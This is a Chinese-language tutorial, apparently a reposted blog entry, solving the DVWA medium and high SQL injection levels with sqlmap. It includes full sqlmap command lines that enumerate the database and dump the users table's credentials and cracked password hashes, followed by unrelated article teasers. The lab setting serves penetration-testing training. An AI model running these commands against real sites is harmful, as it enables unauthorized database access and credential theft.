dvwa SQl注入中级、高级(使用sqlmap渗透)

news2025/3/4 12:13:21
sql注入中级

发现是一个表单提交数据

点提交

改为2,再点提交

burp抓包

发现是以post的方式传递

这里尝试以两种方式解题

(1)-r “txt”的方式

python sqlmap.py -r ""C:\Users\fuqia\Desktop\1.txt"" -p id --batch

-p 指定参数为id --batch 表示全部使用默认选项

发现可以sql注入

python sqlmap.py -r ""C:\Users\fuqia\Desktop\1.txt"" --current-db -p id --batch

查询数据库名字

数据库名字为dvwa

python sqlmap.py -r ""C:\Users\fuqia\Desktop\1.txt"" -p id --batch -D dvwa
--tables

有两个数据表

python sqlmap.py -r ""C:\Users\fuqia\Desktop\1.txt"" -p id --batch -D dvwa -T users --columns

获取列名

python sqlmap.py -r ""C:\Users\fuqia\Desktop\1.txt"" -p id --batch -D dvwa -T users -C "user,password" --dump

获取user和password的数据

注意到sqlmap帮我们自动爆破了md5加密的数据

(2)-data “post”的方式

python sqlmap.py -u "http://10.198.168.174/DVWA-master/vulnerabilities/sqli/#" -data="id=1&Submit=Submit" -p id --batch --current-db

-data= 后面加上post的数据

后面步骤与前面一致

sql注入高级

点击

跳出来另一个表框

随便输一个1,发现有session

注意到提交出来的数据反而在第一个网站显示

抓包

这样就要联合查询了

sqlmap -u "[数据提交页面url]" --data "[request]"  --second-u "[数据显示页面url]" --cookie="[站点cookie]" 
 

python sqlmap.py -u "http://10.198.168.174/DVWA-master/vulnerabilities/sqli/" -data "id=2&Submit=Submit" -p id --second-u "10.198.168.174/DVWA-master/vulnerabilities/sqli/session-input.php#" --ba
tch --cookie "security=high; PHPSESSID=g2c8dvs0savirn1ro00p6orrjj" --current-db

得到结果

python sqlmap.py -u "http://10.198.168.174/DVWA-master/vulnerabilities/sqli/" -data "id=2&Submit=Submit" -p id --second-u "10.198.168.174/DVWA-master/vulnerabilities/sqli/session-input.php#" --ba
tch --cookie "security=high; PHPSESSID=g2c8dvs0savirn1ro00p6orrjj" -D dvwa --tables

后面操作流程与前面一致

总结:

1.-r “txt”和-data "POST"的方式都能对post的数据进行sql注入

2.-p 指定SQL注入参数

3.--batch表示全部默认

4.--cookie “cookie”加入cookie值

5.Python sqlmap.py -u "[数据提交页面url]" --data "[request]"  --second-u "[数据显示页面url]" --cookie="[站点cookie]" 表示联合查询

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1815327.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

为CAP面板天添加简单的认证功能 C#|.net

做过后端的比较熟悉,CAP面板有个界面,可以通过域名加cap访问: 但是这个面板直接通过url就可以访问了。 Hangfire Dashboard有自己的面板,可以使用用户名和密码做简单的认证。 LogDashboard也有自己的面板,可以使用用户名和密码做简单的认证。 如下图: 但是CAP的面板是…

nodejs湖北省智慧乡村旅游平台-计算机毕业设计源码00232

摘 要 随着科学技术的飞速发展,社会的方方面面、各行各业都在努力与现代的先进技术接轨,通过科技手段来提高自身的优势,旅游行业当然也不能排除在外。智慧乡村旅游平台是以实际运用为开发背景,运用软件工程开发方法,采…

JAVA代码审计之文件上传代码审计

1 文件上传简介 1.1 什么是任意文件上传漏洞 任意文件上传漏洞常发生在文件上传功能中,由于后端代码中没有严格限制用户上传的文件,导致攻击者可以上传带有恶意攻击代码的JSP 脚本到目标服务器,进而执行脚本,以达到控制操纵目标…

cesium 渐变虚线效果 PolylineDashMaterialProperty

cesium中有虚线材质PolylineDashMaterialProperty,可以在这个材质的基础上结合uv设置每个顶点的透明度,就能实现渐变的效果了。 一、原理:在glsl中结合uv设置每个顶点的透明度 vec2 st materialInput.st; material.alpha fragColor.a * (1…

【SpringCloud】创建新工程

前言 本文使用的是jdk17,mysql8。 以下用两个服务做演示: 订单服务:提供订单ID,获取订单详细信息。 商品服务:提供商品ID,获取商品详细信息。 对于订单服务和商品服务分别建立数据库: -- 订单服…

Javaweb避坑指北(持续更新)

内容较多可按CtrlF搜索 0.目录 1.获取插入数据后自增长主键的值 2.Controller中返回给ajax请求字符串/json会跳转到xxx.jsp 3.ajax请求获得的json无法解析 4.在Controller中使用ServletFileUpload获取的上传文件为null 5.莫名其妙报service和dao里方法的错误 6.ajax请求拿…

期权费的核心是什么

期权费的核心 在涉足股票期权投资的领域时,投资者们往往会将焦点首先锁定在期权费这一显性成本上。然而,实际操作中,一个更为核心且决定性的考量因素是,目标股票是否具备通过个股期权策略进行买入的潜在价值。特别是,…

NFTScan 正式上线 Sei NFTScan 浏览器和 NFT API 数据服务

2024 年 6 月 12 号,NFTScan 团队正式对外发布了 Sei NFTScan 浏览器,将为 Sei 生态的 NFT 开发者和用户提供简洁高效的 NFT 数据搜索查询服务。NFTScan 作为全球领先的 NFT 数据基础设施服务商,Sei 是继 Bitcoin、Ethereum、BNBChain、Polyg…

数据安全“大考”,双一流高校们来交卷!

又是一年高考落幕 埋头题山卷海的考生们 终于迎来“大解放”! 在数字化浪潮中 众高校面临的重要考试 ——“数据安全大考”还在继续 如何作答? 这些双一流高校交出高分答卷! 数据分类分级如何开展落地? 难点分析&#xff1…

python游标卡尺什么梗

python游标卡尺什么梗?下面给大家介绍一下这个梗: 因为 python 是通过缩进来区分代码块的(而不是{}或者是其他符号),而不是像其他程序语言,缩进仅仅为了可读性。导致打印出来的 python 代码(比…

神经气体生长算法【GNG】

当德国计算神经学家 Bernd Fritzke 在其 1995 年的开创性论文中提出后来被称为神经气体生长(GNG)的算法时,机器学习还是一个相对较新的领域,并且受到实际神经科学的极大启发。 当时,神经科学正处于一个突破性的时代—…

目标检测:将yolo标注的txt文本转为VOC标注的xml文件

1、准备工作 目标检测数据的标注分为两种格式: xml 解释性标签,左上角右下角的坐标txt 记事本文件,类别x,y中心坐标w,h的相对值 需要准备的数据有: 其中images为图像数据,labels为txt文本信息…

【Python】已解决报错:NameError: name ‘xxx‘ is not defined

【Python】已解决报错:NameError: name ‘xxx‘ is not defined 😎 作者介绍:我是程序员洲洲,一个热爱写作的非著名程序员。CSDN全栈优质领域创作者、华为云博客社区云享专家、阿里云博客社区专家博主。 🤓 同时欢迎大…

C++学习笔记(23)——二叉树进阶

系列文章 http://t.csdnimg.cn/QDR3y 目录 系列文章[TOC](目录) 1. 二叉树的优势2. 二叉搜索树概念3. 二叉搜索树操作1. 二叉搜索树的查找2. 二叉搜索树的插入——地址链接重设3. 二叉搜索树的删除——地址链接重设 4. 二叉搜索树的应用——以key为载体,承载复杂信…

618家用智能投影仪推荐:这个高性价比品牌不容错过

随着科技的不断进步,家庭影院的概念已经从传统的大屏幕电视逐渐转向了更为灵活和便携的家用智能投影仪。随着618电商大促的到来,想要购买投影仪的用户们也开始摩拳擦掌了。本文将从投影仪的基础知识入手,为您推荐几款性价比很高的投影仪&…

QGroupbox,Grid Layout,button 水平延伸 布局

实验 sizePolicy水瓶延伸 拖入一个groupbox控件 在groupbox控件中拖入一个grid layout 控件 然后拖入3个pushButton 使其水平排列, 设置button3的 sizePolicy 水平延展 为1 效果

工程项目管理系统:高效、专业的工程管理软件

在当今快速发展的工程行业,有效的项目管理是确保项目成功的关键。鸿鹄工程项目管理系统,基于Spring Cloud、Spring Boot、Mybatis、Vue和ElementUI技术栈,提供了一个全面、高效的解决方案,以应对复杂的工程项目管理挑战。 项目背景…

精益思维在人工智能中的应用体现

随着AI技术的广泛应用,如何提高其效率、降低成本、优化性能,成为了业界关注的焦点。精益思维作为一种追求卓越、持续改进的管理理念,其在人工智能中的应用正逐渐展现出巨大的潜力。 一、数据精益化管理。数据是AI技术的核心,而数据…

JavaScript知识之函数

javascript函数 在JavaScript基础之上提供了部分函数,同时也可以自定义函数,JavaScript基础详见之前的文章javascript基础知识 自定义函数 //关键字 函数名 参数列表 函数体 function test(a,b,c){alert(a":"b":"c) }function test1(a,b){return a;//不…

一文读懂Samtec分离式线缆组件选型 | 快速攻略

【摘要/前言】 2023年,全球线缆组件市场规模大致在2100多亿美元。汽车和电信行业是线缆组件最大的两个市场,中国和北美是最大的两个制造地区。有趣的是,特定应用(即定制)和矩形组件是两个最大的产品组。 【Samtec产品…